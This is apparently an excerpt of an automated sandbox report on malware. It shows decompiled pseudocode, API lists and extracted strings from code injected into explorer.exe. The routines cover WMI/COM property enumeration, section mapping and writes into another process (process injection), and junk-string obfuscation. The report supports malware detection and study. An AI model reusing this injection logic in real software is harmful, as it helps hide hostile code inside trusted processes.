								 *(_t316 +  *_t322) = _v44 - _v16 + 1;
								 *((intOrPtr*)(_t316 +  *_t322 + 4)) = E00F5AC58( *(_t316 +  *_t322) << 3);
								_t209 =  *_t322;
								__eflags =  *(_t316 + _t209 + 4);
								if( *(_t316 + _t209 + 4) == 0) {
									__eflags = _v32 + 0xc;
									E00F5AB81(_v32 + 0xc, 0);
									E00F5AB81( &_v32, 0);
									goto L47;
								}
								_t215 = _v16;
								_v12 = _t215;
								while(1) {
									__eflags = _t215 - _v44;
									if(_t215 > _v44) {
										break;
									}
									_t217 =  &_v12;
									_v48 = 0;
									__imp__#25(_v28, _t217,  &_v48);
									__eflags = _t217;
									if(_t217 < 0) {
										break;
									}
									_t220 = E00F5B6B3(_v48);
									_t65 =  *_t322 + 4; // 0xc4830000
									 *((intOrPtr*)( *((intOrPtr*)(_t316 + _t65)) + (_v12 - _v16) * 8)) = _t220;
									_t221 = _v24;
									_t278 =  *_t221;
									_t222 =  *((intOrPtr*)( *_t221 + 0x10))(_t221, _v48, 0,  &_v72, 0, 0);
									__eflags = _t222;
									if(_t222 < 0) {
										L40:
										__imp__#6(_v48);
										_t134 =  &_v12;
										 *_t134 = _v12 + 1;
										__eflags =  *_t134;
										_t215 = _v12;
										continue;
									}
									_v84 = E00F62CCE(_t278, 0x253);
									 *_t324 = 0xdfc;
									_v92 = E00F62CCE(_t278);
									_t225 = _v72 & 0x0000ffff;
									_pop(_t279);
									__eflags = _t225 - 0xb;
									if(__eflags > 0) {
										__eflags = _t225 - 0x10;
										if(_t225 == 0x10) {
											L36:
											_t226 = E00F5AC58(0x18);
											_t111 =  *_t322 + 4; // 0xc4830000
											 *((intOrPtr*)( *((intOrPtr*)(_t316 + _t111)) + 4 + (_v12 - _v16) * 8)) = _t226;
											_t283 =  *_t322;
											_t228 = _v12 - _v16;
											_t120 = _t283 + 4; // 0xc4830000
											_t284 =  *((intOrPtr*)(_t316 + _t120));
											__eflags =  *(_t284 + 4 + _t228 * 8);
											if( *(_t284 + 4 + _t228 * 8) == 0) {
												L39:
												E00F5BA86( &_v84);
												E00F5BA86( &_v92);
												__imp__#9( &_v72);
												goto L40;
											}
											_push(_v64);
											_push(L"%d");
											L38:
											_t126 =  *_t322 + 4; // 0xc4830000
											_push(0xc);
											_push( *((intOrPtr*)( *((intOrPtr*)(_t316 + _t126)) + 4 + _t228 * 8)));
											E00F5CE46();
											_t324 = _t324 + 0x10;
											goto L39;
										}
										__eflags = _t225 + 0xffffffef - 2;
										if(_t225 + 0xffffffef > 2) {
											L33:
											__eflags = _v72 & 0x00002000;
											if((_v72 & 0x00002000) == 0) {
												_v76 = E00F62CCE(_t279, 0xb50);
												E00F5CE46( &_v608, 0x100, _t236, _v72 & 0x0000ffff);
												E00F5BA86( &_v76);
												_t242 = E00F5B6B3( &_v608);
												_t324 = _t324 + 0x1c;
												L28:
												_t82 =  *_t322 + 4; // 0xc4830000
												 *((intOrPtr*)( *((intOrPtr*)(_t316 + _t82)) + 4 + (_v12 - _v16) * 8)) = _t242;
												goto L39;
											}
											_t242 = E00F62232( &_v72);
											L27:
											goto L28;
										}
										_t244 = E00F5AC58(0x18);
										_t87 =  *_t322 + 4; // 0xc4830000
										 *((intOrPtr*)( *((intOrPtr*)(_t316 + _t87)) + 4 + (_v12 - _v16) * 8)) = _t244;
										_t297 =  *_t322;
										_t228 = _v12 - _v16;
										_t96 = _t297 + 4; // 0xc4830000
										_t298 =  *((intOrPtr*)(_t316 + _t96));
										__eflags =  *(_t298 + 4 + _t228 * 8);
										if( *(_t298 + 4 + _t228 * 8) == 0) {
											goto L39;
										}
										_push(_v64);
										_push(L"%u");
										goto L38;
									}
									if(__eflags == 0) {
										__eflags = _v64 - 0xffff;
										_t246 = L"TRUE";
										if(_v64 != 0xffff) {
											_t246 = L"FALSE";
										}
										_push(_t246);
										L26:
										_t242 = E00F5B6B3();
										goto L27;
									}
									__eflags = _t225 - 1;
									if(__eflags == 0) {
										goto L39;
									}
									if(__eflags <= 0) {
										goto L33;
									}
									__eflags = _t225 - 3;
									if(_t225 <= 3) {
										goto L36;
									}
									__eflags = _t225 - 8;
									if(_t225 != 8) {
										goto L33;
									}
									_push(_v64);
									goto L26;
								}
								__imp__#16(_v28);
								_t218 = _v24;
								 *((intOrPtr*)( *_t218 + 8))(_t218);
								_t314 = 0;
								__eflags = 0;
								L43:
								_t141 =  &_v20;
								 *_t141 = _v20 + 1;
								__eflags =  *_t141;
								continue;
							}
							_t247 = _v24;
							 *((intOrPtr*)( *_t247 + 8))(_t247);
							goto L43;
						}
						goto L48;
					}
					E00F5AB81( &_v32, 0);
					goto L53;
				}
				return 0;
			}

0x00f6281c
0x00f6281e
0x00f62821
0x00f62829
0x00f6282c
0x00f62831
0x00f6283c
0x00f62841
0x00f62842
0x00f62845
0x00f62847
0x00f62c4e
0x00f62c54
0x00f62c5e
0x00000000
0x00f62c63
0x00f62857
0x00f6285a
0x00f62861
0x00f62866
0x00f62867
0x00f6286a
0x00f6286d
0x00f6286e
0x00f62879
0x00f62880
0x00f62889
0x00f6288e
0x00f62891
0x00f62894
0x00f628aa
0x00f628b7
0x00f628ba
0x00f628c1
0x00f628c6
0x00f628cd
0x00f628d2
0x00f628e4
0x00f628e7
0x00f628e9
0x00f62c3e
0x00f62c41
0x00f62c47
0x00f62c4c
0x00000000
0x00f62c4c
0x00f628ef
0x00f628f2
0x00f62bcc
0x00f62bcc
0x00f62bcf
0x00000000
0x00000000
0x00f62911
0x00f62914
0x00f62916
0x00f62c05
0x00f62c05
0x00f62c0b
0x00f62c0e
0x00f62c11
0x00f62c13
0x00f62c37
0x00f62c15
0x00f62c15
0x00f62c1b
0x00f62c26
0x00f62c2d
0x00f62c2d
0x00000000
0x00f62c3d
0x00f6291c
0x00f6291f
0x00f62922
0x00f62925
0x00f62928
0x00f6292b
0x00000000
0x00000000
0x00f62931
0x00f6293f
0x00f62942
0x00f62944
0x00f6295d
0x00f6296c
0x00f62978
0x00f6297b
0x00f6297e
0x00f62982
0x00f62988
0x00f6298a
0x00f62bf1
0x00f62bf4
0x00f62bfa
0x00f62c00
0x00f62c03
0x00f62c03
0x00000000
0x00f62c03
0x00f62999
0x00f629ad
0x00f629b1
0x00f629b5
0x00f629b9
0x00f62bda
0x00f62bdf
0x00f62be9
0x00000000
0x00f62bee
0x00f629bf
0x00f629c2
0x00f62bac
0x00f62bac
0x00f62baf
0x00000000
0x00000000
0x00f629ce
0x00f629d5
0x00f629d8
0x00f629de
0x00f629e0
0x00000000
0x00000000
0x00f629e9
0x00f629f0
0x00f629fc
0x00f629ff
0x00f62a02
0x00f62a0e
0x00f62a11
0x00f62a13
0x00f62b9d
0x00f62ba0
0x00f62ba6
0x00f62ba6
0x00f62ba6
0x00f62ba9
0x00000000
0x00f62ba9
0x00f62a23
0x00f62a26
0x00f62a32
0x00f62a35
0x00f62a39
0x00f62a3a
0x00f62a3d
0x00f62a94
0x00f62a97
0x00f62b37
0x00f62b39
0x00f62b40
0x00f62b4b
0x00f62b52
0x00f62b54
0x00f62b57
0x00f62b57
0x00f62b5b
0x00f62b5f
0x00f62b7f
0x00f62b83
0x00f62b8c
0x00f62b97
0x00000000
0x00f62b97
0x00f62b65
0x00f62b66
0x00f62b6b
0x00f62b6d
0x00f62b71
0x00f62b73
0x00f62b77
0x00f62b7c
0x00000000
0x00f62b7c
0x00f62aa0
0x00f62aa3
0x00f62ae2
0x00f62ae2
0x00f62ae9
0x00f62b06
0x00f62b15
0x00f62b1e
0x00f62b2a
0x00f62b2f
0x00f62a7f
0x00f62a87
0x00f62a8b
0x00000000
0x00f62a8b
0x00f62aef
0x00f62a7e
0x00000000
0x00f62a7e
0x00f62aa7
0x00f62aae
0x00f62ab9
0x00f62ac0
0x00f62ac2
0x00f62ac5
0x00f62ac5
0x00f62ac9
0x00f62acd
0x00000000
0x00000000
0x00f62ad7
0x00f62ad8
0x00000000
0x00f62ad8
0x00f62a3f
0x00f62a67
0x00f62a6c
0x00f62a71
0x00f62a73
0x00f62a73
0x00f62a78
0x00f62a79
0x00f62a79
0x00000000
0x00f62a79
0x00f62a41
0x00f62a44
0x00000000
0x00000000
0x00f62a4a
0x00000000
0x00000000
0x00f62a50
0x00f62a53
0x00000000
0x00000000
0x00f62a59
0x00f62a5c
0x00000000
0x00000000
0x00f62a62
0x00000000
0x00f62a62
0x00f62bb8
0x00f62bbe
0x00f62bc4
0x00f62bc7
0x00f62bc7
0x00f62bc9
0x00f62bc9
0x00f62bc9
0x00f62bc9
0x00000000
0x00f62bc9
0x00f62946
0x00f6294c
0x00000000
0x00f6294c
0x00000000
0x00f62bd5
0x00f6289b
0x00000000
0x00f628a1
0x00000000

Strings

FALSE, xrefs: 00F62A73, 00F62A78
TRUE, xrefs: 00F62A6C

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: Initialize$AllocBlanketCreateInstanceProxySecurityString
String ID: FALSE$TRUE
API String ID: 3531828250-1412513891
Opcode ID: a8024aace1a77b6415d23321ff648c773cedde0e2ed3a92d2391de051b7d63aa
Instruction ID: 2d6c2a5c4f84de3731811888496b94f950d182cc82e5d5a6b6ffcdaf0027c7e2
Opcode Fuzzy Hash: a8024aace1a77b6415d23321ff648c773cedde0e2ed3a92d2391de051b7d63aa
Instruction Fuzzy Hash: F9E17971D00609AFCF10EFE8CC859AEBBB9FF48310F20855AF905A7251DB75A945EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F5EBF6, Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 227
registryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00F5EBF6(intOrPtr _a4, void* _a8) {
				char _v8;
				struct HINSTANCE__* _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr* _v32;
				struct HINSTANCE__* _v40;
				char _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				void* __esi;
				intOrPtr _t76;
				void* _t78;
				intOrPtr* _t82;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t93;
				intOrPtr _t102;
				intOrPtr _t106;
				char _t108;
				intOrPtr _t109;
				intOrPtr _t112;
				intOrPtr _t116;
				void* _t121;
				struct HWND__* _t126;
				void* _t134;
				void* _t142;
				intOrPtr _t146;
				intOrPtr _t147;
				void* _t152;

				_t76 =  *0xf89720; // 0xf90000
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				if(( *(_t76 + 0x1898) & 0x00000040) != 0) {
					E00F62D1F(0x1f4);
					_pop(_t134);
				}
				_v28 = 0;
				_v20 = E00F62CCE(_t134, 0x90b);
				_t78 = E00F5B081(_t77);
				_push( &_v20);
				if(_t78 == 0) {
					E00F5BA86();
					_t82 =  *((intOrPtr*)(_a8 + 0x3c)) + _a8;
					_v32 = _t82;
					if( *_t82 != 0x4550) {
						L17:
						if(_v8 != 0) {
							_t88 =  *0xf897ec; // 0x0
							 *((intOrPtr*)(_t88 + 0x10))(_a4, _v8);
							_v8 = 0;
						}
						L19:
						if(_v12 != 0) {
							_t147 =  *0xf897ec; // 0x0
							 *((intOrPtr*)(_t147 + 0x10))(GetCurrentProcess(), _v12);
						}
						if(_v16 != 0) {
							_t84 =  *0xf897ec; // 0x0
							 *((intOrPtr*)(_t84 + 0x20))(_v16);
						}
						return _v8;
					}
					_push(0);
					_push(0x8000000);
					_v44 =  *((intOrPtr*)(_t82 + 0x50));
					_push(0x40);
					_push( &_v44);
					_push(0);
					_push(0xe);
					_push( &_v16);
					_t93 =  *0xf897ec; // 0x0
					if( *((intOrPtr*)(_t93 + 0xc))() < 0) {
						goto L17;
					}
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsb");
					asm("movsd");
					asm("movsd");
					_v120.lpszClassName =  &_v56;
					asm("movsw");
					_v120.lpfnWndProc = DefWindowProcA;
					asm("movsb");
					_v120.cbWndExtra = 0;
					_v120.style = 0xb;
					_v120.lpszMenuName = 0;
					_v120.cbSize = 0x30;
					_v120.cbClsExtra = 0;
					_v120.hInstance = 0;
					if(RegisterClassExA( &_v120) != 0) {
						_t126 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
						if(_t126 != 0) {
							DestroyWindow(_t126);
							UnregisterClassA( &_v56, 0);
						}
					}
					_push(0x40);
					_push(0);
					_push(2);
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v12);
					_push(GetCurrentProcess());
					_push(_v16);
					_t102 =  *0xf897ec; // 0x0
					if( *((intOrPtr*)(_t102 + 0x14))() < 0) {
						goto L17;
					} else {
						_push(0x40);
						_push(0);
						_push(2);
						_push( &_v24);
						_push(0);
						_push(0);
						_push(0);
						_push( &_v8);
						_push(_a4);
						_t106 =  *0xf897ec; // 0x0
						_push(_v16);
						if( *((intOrPtr*)(_t106 + 0x14))() < 0) {
							goto L17;
						}
						_t108 = E00F5AC29( *0xf89720, 0x1ac4);
						_v20 = _t108;
						if(_t108 == 0) {
							goto L17;
						}
						 *((intOrPtr*)(_t108 + 0x224)) = _v8;
						_t109 =  *0xf89740; // 0x547f6c8
						_t146 =  *((intOrPtr*)(_t109 + 0x54))(_a4, 0, 0x1ac4, 0x1000, 4);
						_t112 =  *0xf89740; // 0x547f6c8
						 *((intOrPtr*)(_t112 + 0x20))(_a4, _t146, _v20, 0x1ac4,  &_v28);
						E00F5AB81( &_v20, 0x1ac4);
						_t116 =  *0xf89720; // 0xf90000
						_v20 = _t116;
						 *0xf89720 = _t146;
						memcpy(_v12, _a8,  *(_v32 + 0x50));
						E00F5EF97(_v8, _v8, _v12, _a8);
						_t121 = E00F5ACD6("237");
						_t152 = 0xf;
						if(_t121 <= _t152) {
							_t152 = _t121;
						}
						_t142 = 0;
						if(_t152 <= 0) {
							L16:
							 *0xf89720 = _v20;
							goto L19;
						} else {
							do {
								_t142 = _t142 + 1;
							} while (_t142 < _t152);
							goto L16;
						}
					}
				}
				E00F5BA86();
				return 0;
			}

0x00f5ebfc
0x00f5ec05
0x00f5ec08
0x00f5ec0b
0x00f5ec0e
0x00f5ec11
0x00f5ec14
0x00f5ec1f
0x00f5ec26
0x00f5ec2b
0x00f5ec2b
0x00f5ec31
0x00f5ec3a
0x00f5ec3d
0x00f5ec49
0x00f5ec4a
0x00f5ec59
0x00f5ec65
0x00f5ec6d
0x00f5ec70
0x00f5ee2e
0x00f5ee31
0x00f5ee36
0x00f5ee3e
0x00f5ee41
0x00f5ee41
0x00f5ee44
0x00f5ee47
0x00f5ee4c
0x00f5ee59
0x00f5ee59
0x00f5ee5f
0x00f5ee64
0x00f5ee69
0x00f5ee69
0x00000000
0x00f5ee6c
0x00f5ec79
0x00f5ec7a
0x00f5ec7f
0x00f5ec82
0x00f5ec87
0x00f5ec88
0x00f5ec89
0x00f5ec8e
0x00f5ec8f
0x00f5ec99
0x00000000
0x00000000
0x00f5eca7
0x00f5eca8
0x00f5eca9
0x00f5ecaa
0x00f5ecb3
0x00f5ecb4
0x00f5ecb8
0x00f5ecc0
0x00f5ecc2
0x00f5ecc9
0x00f5ecca
0x00f5eccd
0x00f5ecd4
0x00f5ecd7
0x00f5ecde
0x00f5ece1
0x00f5eced
0x00f5ed0f
0x00f5ed17
0x00f5ed1a
0x00f5ed25
0x00f5ed25
0x00f5ed17
0x00f5ed2b
0x00f5ed2d
0x00f5ed2e
0x00f5ed33
0x00f5ed34
0x00f5ed35
0x00f5ed36
0x00f5ed3a
0x00f5ed41
0x00f5ed42
0x00f5ed45
0x00f5ed4f
0x00000000
0x00f5ed55
0x00f5ed55
0x00f5ed57
0x00f5ed58
0x00f5ed5d
0x00f5ed5e
0x00f5ed5f
0x00f5ed60
0x00f5ed64
0x00f5ed65
0x00f5ed68
0x00f5ed6d
0x00f5ed75
0x00000000
0x00000000
0x00f5ed87
0x00f5ed8e
0x00f5ed93
0x00000000
0x00000000
0x00f5eda8
0x00f5edae
0x00f5edb6
0x00f5edbc
0x00f5edc9
0x00f5edd1
0x00f5edd6
0x00f5eddb
0x00f5ede1
0x00f5edf0
0x00f5edfe
0x00f5ee08
0x00f5ee12
0x00f5ee15
0x00f5ee17
0x00f5ee17
0x00f5ee19
0x00f5ee1d
0x00f5ee24
0x00f5ee27
0x00000000
0x00f5ee1f
0x00f5ee1f
0x00f5ee1f
0x00f5ee20
0x00000000
0x00f5ee1f
0x00f5ee1d
0x00f5ed4f
0x00f5ec4c
0x00000000

APIs

RegisterClassExA.USER32(?), ref: 00F5ECE4
CreateWindowExA.USER32 ref: 00F5ED0F
DestroyWindow.USER32(00000000), ref: 00F5ED1A
UnregisterClassA.USER32(?,00000000), ref: 00F5ED25
GetCurrentProcess.KERNEL32(00F5676D,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 00F5ED3B
memcpy.MSVCRT ref: 00F5EDF0
GetCurrentProcess.KERNEL32(00F5676D,00000000), ref: 00F5EE52

Strings

237, xrefs: 00F5EE03
cdcdwqwqwq, xrefs: 00F5ECAB
sadccdcdsasa, xrefs: 00F5EC9F
0, xrefs: 00F5ECD7

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ClassCurrentProcessWindow$CreateDestroyRegisterUnregistermemcpy
String ID: 0$237$cdcdwqwqwq$sadccdcdsasa
API String ID: 3040207322-782192524
Opcode ID: b0d45dcdbcf44e9686f0df57acff30da8d3253c807003caf0e91ac8ab314bbe4
Instruction ID: 6c2beed4e20c1928188806164c03e3c4cbf35965daf02851255827ae314e8653
Opcode Fuzzy Hash: b0d45dcdbcf44e9686f0df57acff30da8d3253c807003caf0e91ac8ab314bbe4
Instruction Fuzzy Hash: 0E814BB191020DAFDB00DFA4DC85EEEBBB9FB08351F144069FA05AB251D7709E44EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F592B1, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 173
filestringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00F592B1(struct HDC__* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				struct HDC__* _v12;
				char _v16;
				struct HDC__* _v17;
				char _v32;
				short _v100;
				char* _t39;
				char _t41;
				signed int _t42;
				void* _t46;
				signed int _t52;
				signed int _t54;
				void* _t57;
				char _t58;
				intOrPtr _t61;
				void* _t64;
				struct HDC__* _t74;
				void* _t75;
				signed short _t76;
				struct HDC__* _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				CHAR** _t93;
				void* _t95;
				void* _t96;
				void* _t110;
				void* _t117;

				_t117 = __fp0;
				_t89 = __edx;
				_t39 =  *0xf897b8; // 0x547d420
				_v8 = _v8 | 0xffffffff;
				if( *_t39 != 0) {
					_t74 = 0;
					__eflags = 0;
					goto L29;
				} else {
					_v12 = E00F5C979(0x2d);
					GetLastError();
					_t57 = E00F5ACD6("86KUcdlZxd3ht.z jTByomvvC86,myy,8ib95xDHTMAZYxxkApv9UKR Nb,ZvAW6Emy7V6q26m9Pc I eiMeAjwhRL3r maEvYq2bIbq,kSDK5spTGpqpdFPZKcxM0Lr bftu6qmKe45r8zJd C4uPIF50p2XvxV78Snrc2v64RbIT0Y24yu7S1pQkiz J6XE2io5GcL.PeZOU k6XpywUBe5 iJe0okkduKFJXJAnClyM9zuFXATohZJ pW c38aXIz8peBW4Lu7153O6fPcQd7ANSan0AR8WdrJBvEpqQaYcZI2qe5zZ1Ssvy6gG2mP6hPWlLylUX BiakjpYPmi7eA1jaHVlmF2J0VkLs90ms uQ  9mGDQUvMSPWyviDikUHn ,Mprjb P84ENNEB99LzhA4tgSAKLYraG4vNmhnWKmAFWo1ma rYqqj 1NDR5 PdjDgkpqQ65olTVl4K8JETqB3SnHS bNdbAQiv0o,YW s2W1xpyHRxtincp,snMhKhlfJmMJXYAgEk4NAwk2KsmlP.IXHCgpL6pKgyqvzJIVsuKA4kR26SIR bmYOnZ1csYezB8VUlEjkFJTz2ZK,SyU,lnyxx nt7MsZaffB9hLLI6gSms 8oS A");
					_t91 = 0xf;
					if(_t57 <= _t91) {
						_t91 = _t57;
					}
					_t75 = 0;
					_v17 = 0;
					if(_t91 != 0) {
						do {
							_t5 = _t75 + 0x42; // 0x42
							 *((char*)(_t95 + _t75 - 0x1c)) = _t5;
							MultiByteToWideChar(0, 0,  &_v32, 0xffffffff,  &_v100, 0x20);
							_t75 = _t75 + 1;
						} while (_t75 < _t91);
					}
					_t58 = E00F5C373(_t89, 0x2e);
					_t89 = _v12;
					_t74 = 0;
					_v16 = _t58;
					if(_t89 != 0 && _t58 != 0xffffffff) {
						_t61 =  *0xf897b8; // 0x547d420
						E00F5CF8A(_t61, 0x100, _t89);
						GetLastError();
						_t64 = E00F5ACD6("aNbV8Itp1XZ,DM0  hrVLNgFE69tin9NV Uxp,H3pcklEFIt cnGOURUjtLhjB5b MI8wVy0mYYW2p  ZGyN2LzuStkuB14pBN0PFM3nX2PIfD7YP.oiJstyfwsP xg.vMKgbZUQj5uDm7wdHw3DtTqSK7DRHyk9 b. 6KTNB8ChpOXY0tSgAF AlONueE6Sz5W xzVZR 21,AGR5MRdQ7AU3RtmpaYxJ8PDBAMjbgI mdGT6EAlzoqY5n9NE9ditkfN48ng,g4jQCS4NGlDwx,7jeFTF32Nkj,GhPgskCuNGTkU1B7V.6ICP UIWV4dSLmH187 t6qX2FDS12uAdQCkSTFBSw6ckic6gVwAKkxywoJVBKYQoO0eUCqjHmgJGV,VDK3.Zf.p15mGpLlebBlvoABztPG,aMfwPUzcCs4Hk3R45zr0Aj1mSLtmBhBkg758cs5sWUcr08JeDCHBJ25ROV.wywJ7720DerhQWhwsMhk9syZvlJCunH eJW3v8vOqLdwPM8p 4 oBsNZI,qgtN .H ebr4fKtDI1to6MbsbFAu0CQR0USJGeEtN0");
						_t92 = 0xf;
						if(_t64 <= _t92) {
							_t92 = _t64;
						}
						_v17 = _t74;
						if(_t92 != 0) {
							do {
								_t13 = _t74 + 0x42; // 0x42
								 *((char*)(_t95 + _t74 - 0x1c)) = _t13;
								MultiByteToWideChar(0, 0,  &_v32, 0xffffffff,  &_v100, 0x20);
								_t74 =  &(_t74->i);
							} while (_t74 < _t92);
						}
						 *0xf897c4 = _v16;
						_t74 = 0;
					}
					E00F5AB81( &_v12, 0xffffffff);
					_t39 =  *0xf897b8; // 0x547d420
					if( *_t39 != 0) {
						L29:
						_t76 =  *0xf897c4; // 0x0
						__eflags = _t76 - _t74;
						if(__eflags == 0) {
							goto L13;
						} else {
							_t54 = E00F58EBE(_t89, __eflags, _a8, _t39, _t76 & 0x0000ffff, _a4);
							_t96 = _t96 + 0x10;
							_v8 = _t54;
							__eflags = _t54 - _t74;
							if(_t54 < _t74) {
								goto L13;
							} else {
								return _t54;
							}
						}
						L27:
						return _t42;
					}
				}
				L13:
				_v12 = _t74;
				_t41 = E00F59AA4(_t89, _t117,  &_v12);
				_v16 = _t41;
				if(_t41 != _t74) {
					_t90 = 0;
					if(_v12 > _t74) {
						_t24 = _t41 + 4; // 0x4
						_t93 = _t24;
						while(1) {
							_t46 = E00F5CEF9(_t89, _t74);
							_t110 = _t89 - _t74;
							if(_t110 <= 0 && (_t110 < 0 || _t46 < 0x2bcf)) {
								CreateEnhMetaFileA(_t74, "Ga00eZ0M4scD7pkCRDA  V2tfMrxP0nikDQzWPBFd4wsmajCP 1wiw6vmoYYV1pNVKHMAFz1fixPLjN6S mj74pTs1ITuCFVEyxODV,GQZnsbds4X.MeGl8wU2XCO4ZjH9saarU uLsNeaT,Txi60kRmuSEmXMZhF744s,w2Y47Hid45t6x2iMK  imspxkhtT8it 87su JeLQbRhNCfE5YX,4rSSS8KTWdQ THn5tzOog5Poz3SlJLqAG1QWpHu73 S L9TbuHiMgoWKF LZhv3DoE0X8CoZgFKmQ7Pv0tgSQZhDIoEfo.kRTs37WgM1N16FIKd2Js8q82I3hvGocDn9R5yMHDOwetF1zqQNUGQvXBCVRV7Ph9WYqXDvFc3ZVIwTYVM Q5JupsFC4mgTVt96tH kvCh6OVEremcDiQ42hsoCdtlQ T724MWlVbtK GccFIh5,FzTwoN6.alMcZSjbXQiBNOYBFhhCjYu8x CRj06vBEZ4omE3yx6mLeZsTfFI5qhhwAhhSzHlJdy dV7  U8SqkSPWITpt0R qXJ", _t74, _t74);
							}
							_t112 =  *_t93 - _t74;
							if( *_t93 != _t74) {
								__imp__#12(0x10);
								lstrcpynA( &_v32,  *_t93,  *_t93);
								_t52 = E00F58EBE(_t89, _t112, _a8,  &_v32, _t93[1] & 0x0000ffff, _a4);
								_t96 = _t96 + 0x10;
								_v8 = _t52;
							}
							if(_v8 >= _t74) {
								goto L24;
							}
							_t90 = _t90 + 1;
							_t93 =  &(_t93[8]);
							if(_t90 < _v12) {
								continue;
							}
							goto L24;
						}
					}
					L24:
					E00F5AB81( &_v16, _v12);
				}
				_t42 = _v8;
				if(_t42 < _t74) {
					return _t42 | 0xffffffff;
				}
				goto L27;
			}

0x00f592b1
0x00f592b1
0x00f592b7
0x00f592bc
0x00f592c6
0x00f5944c
0x00f5944c
0x00000000
0x00f592cc
0x00f592d4
0x00f592d7
0x00f592e2
0x00f592ea
0x00f592ed
0x00f592ef
0x00f592ef
0x00f592f7
0x00f592f9
0x00f592ff
0x00f59301
0x00f59303
0x00f59306
0x00f59318
0x00f5931a
0x00f5931b
0x00f59301
0x00f59321
0x00f59326
0x00f59329
0x00f5932c
0x00f59331
0x00f59338
0x00f59342
0x00f59347
0x00f59352
0x00f5935a
0x00f5935d
0x00f5935f
0x00f5935f
0x00f59361
0x00f59366
0x00f59368
0x00f5936a
0x00f5936d
0x00f5937f
0x00f59381
0x00f59382
0x00f59368
0x00f5938a
0x00f59390
0x00f59390
0x00f59398
0x00f5939d
0x00f593a7
0x00f5944e
0x00f5944e
0x00f59455
0x00f59458
0x00000000
0x00f5945e
0x00f59469
0x00f5946e
0x00f59471
0x00f59474
0x00f59476
0x00000000
0x00000000
0x00000000
0x00000000
0x00f59476
0x00f5944b
0x00f5944b
0x00f5944b
0x00f593a7
0x00f593ad
0x00f593b1
0x00f593b4
0x00f593ba
0x00f593bf
0x00f593c1
0x00f593c6
0x00f593c8
0x00f593c8
0x00f593cb
0x00f593cc
0x00f593d2
0x00f593d4
0x00f593e7
0x00f593e7
0x00f593ed
0x00f593ef
0x00f593f6
0x00f59401
0x00f59416
0x00f5941b
0x00f5941e
0x00f5941e
0x00f59424
0x00000000
0x00000000
0x00f59426
0x00f59427
0x00f5942d
0x00000000
0x00000000
0x00000000
0x00f5942d
0x00f593cb
0x00f5942f
0x00f59436
0x00f5943c
0x00f5943d
0x00f59442
0x00000000
0x00f59444
0x00000000

APIs

GetLastError.KERNEL32(?,74B5F500,00000000), ref: 00F592D7
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00F59318
GetLastError.KERNEL32 ref: 00F59347
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00F5937F
CreateEnhMetaFileA.GDI32(00000000,Ga00eZ0M4scD7pkCRDA V2tfMrxP0nikDQzWPBFd4wsmajCP 1wiw6vmoYYV1pNVKHMAFz1fixPLjN6S mj74pTs1ITuCFVEyxODV,GQZnsbds4X.MeGl8wU2XCO4ZjH9saarU uLsNeaT,Txi60kRmuSEmXMZhF744s,w2Y47Hid45t6x2iMK imspxkhtT8it 87su JeLQbRhNCfE5YX,4rSSS8KTWdQ THn5tzOog5Poz3SlJLqAG1QWpHu73 ,00000000,00000000), ref: 00F593E7
inet_ntoa.WS2_32(00000000), ref: 00F593F6
lstrcpynA.KERNEL32(?,00000000), ref: 00F59401

Strings

86KUcdlZxd3ht.z jTByomvvC86,myy,8ib95xDHTMAZYxxkApv9UKR Nb,ZvAW6Emy7V6q26m9Pc I eiMeAjwhRL3r maEvYq2bIbq,kSDK5spTGpqpdFPZKcxM0Lr bftu6qmKe45r8zJd C4uPIF50p2XvxV78Snrc2v64RbIT0Y24yu7S1pQkiz J6XE2io5GcL.PeZOU k6XpywUBe5 iJe0okkduKFJXJAnClyM9zuFXATohZJ pW c38aXIz, xrefs: 00F592DD
aNbV8Itp1XZ,DM0 hrVLNgFE69tin9NV Uxp,H3pcklEFIt cnGOURUjtLhjB5b MI8wVy0mYYW2p ZGyN2LzuStkuB14pBN0PFM3nX2PIfD7YP.oiJstyfwsP xg.vMKgbZUQj5uDm7wdHw3DtTqSK7DRHyk9 b. 6KTNB8ChpOXY0tSgAF AlONueE6Sz5W xzVZR 21,AGR5MRdQ7AU3RtmpaYxJ8PDBAMjbgI mdGT6EAlzoqY5n9NE9ditkfN, xrefs: 00F5934D
Ga00eZ0M4scD7pkCRDA V2tfMrxP0nikDQzWPBFd4wsmajCP 1wiw6vmoYYV1pNVKHMAFz1fixPLjN6S mj74pTs1ITuCFVEyxODV,GQZnsbds4X.MeGl8wU2XCO4ZjH9saarU uLsNeaT,Txi60kRmuSEmXMZhF744s,w2Y47Hid45t6x2iMK imspxkhtT8it 87su JeLQbRhNCfE5YX,4rSSS8KTWdQ THn5tzOog5Poz3SlJLqAG1QWpHu73 , xrefs: 00F593E1
@}1u, xrefs: 00F593F6

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

